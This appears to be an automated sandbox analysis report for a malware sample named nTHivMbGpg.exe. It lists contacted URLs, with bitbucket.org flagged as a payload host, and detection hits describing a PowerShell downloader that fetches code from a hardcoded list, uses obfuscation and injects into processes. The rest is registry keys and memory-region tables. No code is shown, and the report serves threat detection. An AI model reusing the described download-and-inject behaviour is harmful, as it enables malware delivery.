http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi

unknown

http://nuget.org/NuGet.exe

unknown

http://www.apache.org/licenses/LICENSE-2.0

unknown

https://id.atlassian.com/login

unknown

http://pesterbdd.com/images/Pester.png

unknown

https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

https://id.atlassian.com/logout

unknown

http://bitbucket.org

unknown

https://web-security-reports.services.atlassian.com/csp-report/bb-website

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj

unknown

https://contoso.com/Icon

unknown

https://dz8aopenkvv6s.cloudfront.net

unknown

https://github.com/Pester/Pester

unknown

https://id.atlassian.com/manage-profile/

unknown

https://id.atlassian.com/login?prompt=login&continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/

unknown

https://cdn.cookielaw.org/

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_

unknown

https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;

unknown

https://remote-app-switcher.stg-east.frontend.public.atl-paas.net

unknown

https://aka.ms/pscore68

unknown

https://oneget.org

unknown

There are 42 hidden URLs, click here to show them.

Domains

Name

Malicious

bitbucket.org

185.166.143.50

Details

Name:	bitbucket.org
IP:	185.166.143.50
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Suricata IDS alerts with low severity for network traffic	Networking
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

185.166.143.50

bitbucket.org

Germany

Details

IP:	185.166.143.50
TargetID:	5
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Germany
Countrycode:	DEU
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false
Domain:	bitbucket.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts with low severity for network traffic	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

wextract_cleanup0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

There are 5 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7FFB1E3B6000

unkown

page readonly

2ADC8F8000

stack

page read and write

2712F73D000

heap

page read and write

7FFAACCC0000

trusted library allocation

page read and write

7FFAACB90000

trusted library allocation

page read and write

17DBB0B1000

heap

page read and write

7FFAACC40000

trusted library allocation

page read and write

CF00ABE000

stack

page read and write

2ADC6FF000

stack

page read and write

17DBCB80000

heap

page readonly

CF00E3E000

stack

page read and write

21ED5B00000

heap

page read and write

2712F72F000

heap

page read and write

27132D60000

trusted library allocation

page read and write

17DBCD5D000

trusted library allocation

page read and write

21ED5940000

heap

page read and write

7FFAAC9F3000

trusted library allocation

page execute and read and write

7FFAACC70000

trusted library allocation

page read and write

271332D7000

trusted library allocation

page read and write

27131125000

heap

page read and write

27149901000

heap

page read and write

27149870000

heap

page read and write

27132F2C000

trusted library allocation

page read and write

2ADCB7E000

stack

page read and write

2714993E000

heap

page read and write

21ED7978000

heap

page read and write

17DBB0AA000

heap

page read and write

271417A2000

trusted library allocation

page read and write

2ADC5FD000

stack

page read and write

17DBCEAE000

trusted library allocation

page read and write

252430E7000

heap

page read and write

7FFAACAAC000

trusted library allocation

page execute and read and write

17DBB128000

heap

page read and write

17DD5275000

heap

page read and write

2714973F000

heap

page read and write

271310B3000

trusted library allocation

page read and write

27131120000

heap

page read and write

252432F0000

heap

page read and write

17DBCD30000

heap

page read and write

7FFAACC80000

trusted library allocation

page read and write

7FF6FD219000

unkown

page readonly

27132225000

trusted library allocation

page read and write

7FFAACC50000

trusted library allocation

page read and write

CF00CBE000

stack

page read and write

21ED5940000

heap

page read and write

17DBD149000

trusted library allocation

page read and write

17DD5249000

heap

page read and write

CF00EBC000

stack

page read and write

7FFAACA30000

trusted library allocation

page read and write

17DBCE6B000

trusted library allocation

page read and write

7FFAACBAA000

trusted library allocation

page read and write

17DD52B0000

heap

page execute and read and write

CF00B37000

stack

page read and write

27149700000

heap

page read and write

27132CDC000

trusted library allocation

page read and write

CF00673000

stack

page read and write

B77879E000

stack

page read and write

21ED5940000

heap

page read and write

7FFAACC00000

trusted library allocation

page read and write

27132CE5000

trusted library allocation

page read and write

7FFAACBE0000

trusted library allocation

page execute and read and write

CF0077E000

stack

page read and write

CF008FE000

stack

page read and write

271332D3000

trusted library allocation

page read and write

17DD5390000

heap

page read and write

17DBB3E5000

heap

page read and write

7FFAACBA1000

trusted library allocation

page read and write

27149945000

heap

page read and write

7FFAACBD1000

trusted library allocation

page read and write

27132C25000

trusted library allocation

page read and write

17DBB07E000

heap

page read and write

7FFAACC70000

trusted library allocation

page read and write

17DBCB50000

trusted library allocation

page read and write

271497C0000

heap

page read and write

17DD5380000

heap

page execute and read and write

7FFAAC9FD000

trusted library allocation

page execute and read and write

17DD51FD000

heap

page read and write

2712F640000

heap

page read and write

21ED5900000

heap

page read and write

2712F6E2000

heap

page read and write

17DD51F1000

heap

page read and write

B778A7E000

stack

page read and write

7FFAACCB0000

trusted library allocation

page read and write

17DBB220000

heap

page read and write

27149880000

heap

page read and write

21ED593C000

heap

page read and write

17DBCDD4000

trusted library allocation

page read and write

17DBCE65000

trusted library allocation

page read and write

7FFAACC10000

trusted library allocation

page execute and read and write

7FFAACC50000

trusted library allocation

page read and write

21ED5C85000

heap

page read and write

21ED5934000

heap

page read and write

7FFAACC90000

trusted library allocation

page read and write

7FFB1E3C0000

unkown

page read and write

17DBB11B000

heap

page read and write

17DD5265000

heap

page read and write

27131825000

trusted library allocation

page read and write

CF00BB9000

stack

page read and write

2ADC877000

stack

page read and write

CECBB7E000

stack

page read and write

2712F6C0000

trusted library allocation

page read and write

2712F74D000

heap

page read and write

2ADC67E000

stack

page read and write

25242FF0000

heap

page read and write

271310F0000

trusted library allocation

page read and write

2712F73B000

heap

page read and write

CF00D3E000

stack

page read and write

27133078000

trusted library allocation

page read and write

17DBCE79000

trusted library allocation

page read and write

7FFAACCC0000

trusted library allocation

page read and write

7FFAACA24000

trusted library allocation

page read and write

7FFAACBE0000

trusted library allocation

page execute and read and write

2714975C000

heap

page read and write

17DBCA56000

heap

page read and write

21ED5910000

heap

page read and write

7FFAACBF0000

trusted library allocation

page read and write

7FFAACC80000

trusted library allocation

page read and write

2ADC1BE000

stack

page read and write

2712F6E0000

heap

page read and write

7FFAACA3B000

trusted library allocation

page read and write

7FFAACAB0000

trusted library allocation

page execute and read and write

7FFAACBDA000

trusted library allocation

page read and write

2712F775000

heap

page read and write

7FFAACB06000

trusted library allocation

page execute and read and write

17DD5387000

heap

page execute and read and write

271497E4000

heap

page read and write

2712F510000

heap

page read and write

27149867000

heap

page execute and read and write

27132D64000

trusted library allocation

page read and write

27149936000

heap

page read and write

27132CED000

trusted library allocation

page read and write

CF0087D000

stack

page read and write

2ADC87E000

stack

page read and write

7FFAACAE0000

trusted library allocation

page execute and read and write

7FFAACBC0000

trusted library allocation

page execute and read and write

7FFAACC20000

trusted library allocation

page read and write

17DBD15D000

trusted library allocation

page read and write

27130FA8000

heap

page read and write

7FFAACD10000

trusted library allocation

page read and write

2712F712000

heap

page read and write

271415F1000

trusted library allocation

page read and write

252430E0000

heap

page read and write

27149830000

heap

page read and write

17DBCDAA000

trusted library allocation

page read and write

27132D1F000

trusted library allocation

page read and write

25243200000

heap

page read and write

7FFAACA22000

trusted library allocation

page read and write

17DD5273000

heap

page read and write

7FFAACD70000

trusted library allocation

page read and write

17DBB030000

heap

page read and write

271495F3000

heap

page read and write

CF0097E000

stack

page read and write

17DD51BC000

heap

page read and write

B77871C000

stack

page read and write

17DBD16F000

trusted library allocation

page read and write

CF0188E000

stack

page read and write

27149918000

heap

page read and write

2712F610000

heap

page read and write

17DBD28F000

trusted library allocation

page read and write

2ADCAFF000

stack

page read and write

7FFAACAD6000

trusted library allocation

page read and write

2712F739000

heap

page read and write

21ED7778000

heap

page read and write

17DCCD50000

trusted library allocation

page read and write

17DBD108000

trusted library allocation

page read and write

2ADC47E000

stack

page read and write

17DBD2DE000

trusted library allocation

page read and write

7FF6FD21C000

unkown

page write copy

7FF6FD21C000

unkown

page read and write

21ED592B000

heap

page read and write

CF00C3A000

stack

page read and write

17DBCE73000

trusted library allocation

page read and write

7FFB1E3A1000

unkown

page execute read

2712F72D000

heap

page read and write

7FFAACA2D000

trusted library allocation

page execute and read and write

17DD5190000

heap

page read and write

7FFAACC30000

trusted library allocation

page read and write

7FFAACD40000

trusted library allocation

page read and write

CF00DBE000

stack

page read and write

7FFAACD00000

trusted library allocation

page read and write

17DBCE68000

trusted library allocation

page read and write

17DBCC00000

trusted library allocation

page read and write

2713320E000

trusted library allocation

page read and write

7FFAAC9F2000

trusted library allocation

page read and write

17DBB010000

heap

page read and write

271498EB000

heap

page read and write

7FF6FD210000

unkown

page readonly

7FFB1E3C2000

unkown

page readonly

7DF40FA70000

trusted library allocation

page execute and read and write

2ADC979000

stack

page read and write

CF007FE000

stack

page read and write

2712F77A000

heap

page read and write

7FFAACCA0000

trusted library allocation

page read and write

2ADCBFB000

stack

page read and write

17DBB3E0000

heap

page read and write

17DD5237000

heap

page read and write

27132F01000

trusted library allocation

page read and write

7FFAACCD0000

trusted library allocation

page read and write

252431E0000

heap

page read and write

7FFAACD90000

trusted library allocation

page read and write

7FFAACC60000

trusted library allocation

page read and write

17DBCA30000

heap

page read and write

7FF6FD210000

unkown

page readonly

17DBB200000

heap

page read and write

17DBD0E0000

trusted library allocation

page read and write

27141600000

trusted library allocation

page read and write

7FFAACC90000

trusted library allocation

page read and write

7FFB1E3C0000

unkown

page read and write

2712F660000

heap

page read and write

7FFAACD50000

trusted library allocation

page read and write

17DBD3E6000

trusted library allocation

page read and write

7FFAACA23000

trusted library allocation

page execute and read and write

17DBD22E000

trusted library allocation

page read and write

7FFB1E3C5000

unkown

page readonly

7FFB1E3A0000

unkown

page readonly

2ADC7F9000

stack

page read and write

17DBD256000

trusted library allocation

page read and write

7FFAACAD6000

trusted library allocation

page execute and read and write

7FFAACD10000

trusted library allocation

page read and write

27141660000

trusted library allocation

page read and write

17DBB041000

heap

page read and write

7FFAACD20000

trusted library allocation

page read and write

7FFAAC9F4000

trusted library allocation

page read and write

271315F1000

trusted library allocation

page read and write

25244C50000

heap

page read and write

27132CE9000

trusted library allocation

page read and write

2ADC1FE000

stack

page read and write

7FFAACB10000

trusted library allocation

page execute and read and write

271498E8000

heap

page read and write

7FFAACD80000

trusted library allocation

page read and write

7FFAACCD0000

trusted library allocation

page read and write

271310B0000

trusted library allocation

page read and write

2ADCA7E000

stack

page read and write

27132CC9000

trusted library allocation

page read and write

7FF6FD21E000

unkown

page readonly

7FFAACC40000

trusted library allocation

page read and write

17DCCD41000

trusted library allocation

page read and write

2712F731000

heap

page read and write

CECBBFF000

stack

page read and write

27131520000

heap

page read and write

27132CC5000

trusted library allocation

page read and write

7FFAACD30000

trusted library allocation

page read and write

2712F645000

heap

page read and write

27149923000

heap

page read and write

7FFAACAD0000

trusted library allocation

page read and write

17DBCA05000

heap

page read and write

21ED5AE0000

heap

page read and write

CF0190D000

stack

page read and write

17DD53BD000

heap

page read and write

17DBD120000

trusted library allocation

page read and write

17DBD181000

trusted library allocation

page read and write

17DBD3F0000

trusted library allocation

page read and write

7FF6FD211000

unkown

page execute read

7FFAACCE0000

trusted library allocation

page read and write

271315E0000

heap

page execute and read and write

7FFAACC20000

trusted library allocation

page read and write

17DD51DA000

heap

page read and write

7FFAACBD2000

trusted library allocation

page read and write

7FFAACC02000

trusted library allocation

page read and write

17DBD266000

trusted library allocation

page read and write

CECBA7C000

stack

page read and write

252432F5000

heap

page read and write

21ED593C000

heap

page read and write

7FFAACBF0000

trusted library allocation

page execute and read and write

7FFAACBB0000

trusted library allocation

page execute and read and write

17DBD137000

trusted library allocation

page read and write

7FFAACCB0000

trusted library allocation

page read and write

271498B2000

heap

page read and write

17DBD3F9000

trusted library allocation

page read and write

17DCCDAF000

trusted library allocation

page read and write

21ED5C80000

heap

page read and write

2714977F000

heap

page read and write

2712F5F0000

heap

page read and write

27130FA6000

heap

page read and write

7FFAACC10000

trusted library allocation

page read and write

7FF6FD211000

unkown

page execute read

7FFAACD00000

trusted library allocation

page read and write

7FF6FD219000

unkown

page readonly

7FFAACCF0000

trusted library allocation

page read and write

7FFAACCA0000

trusted library allocation

page read and write

7FFAACC60000

trusted library allocation

page read and write

7FFAACADC000

trusted library allocation

page execute and read and write

7FF6FD21E000

unkown

page readonly

2ADC57E000

stack

page read and write

CF009FE000

stack

page read and write

17DBCA10000

heap

page read and write

2ADC4FF000

stack

page read and write

17DBD12F000

trusted library allocation

page read and write

7FFAACD60000

trusted library allocation

page read and write

21ED5917000

heap

page read and write

CF006FE000

stack

page read and write

17DD5300000

heap

page read and write

7FFAACB40000

trusted library allocation

page execute and read and write

7FFAACCE0000

trusted library allocation

page read and write

27132DA2000

trusted library allocation

page read and write

17DBCB70000

trusted library allocation

page read and write

2ADC77E000

stack

page read and write

2712F6EB000

heap

page read and write

17DBCE62000

trusted library allocation

page read and write

27130F80000

heap

page read and write

21ED593E000

heap

page read and write

17DBCA00000

heap

page read and write

2712F6D0000

heap

page readonly

7FFAACB92000

trusted library allocation

page read and write

2714974C000

heap

page read and write

271498DD000

heap

page read and write

2712F6A0000

trusted library allocation

page read and write

271315A0000

heap

page execute and read and write

17DBCCF0000

heap

page execute and read and write

7FFAACBC0000

trusted library allocation

page read and write

7FFAACCF0000

trusted library allocation

page read and write

2ADC9FE000

stack

page read and write

17DBCD41000

trusted library allocation

page read and write

27132DAE000

trusted library allocation

page read and write

17DBB080000

heap

page read and write

27132F88000

trusted library allocation

page read and write

2713167C000

trusted library allocation

page read and write

7FFAACA00000

trusted library allocation

page read and write

2ADC133000

stack

page read and write

7FFAACC30000

trusted library allocation

page read and write

7FFAACAA6000

trusted library allocation

page read and write

CF00A79000

stack

page read and write

27149860000

heap

page execute and read and write

CECBAFE000

stack

page read and write

7FFAACAA0000

trusted library allocation

page read and write

There are 315 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
nTHivMbGpg.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportnTHivMbGpg.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
nTHivMbGpg.exe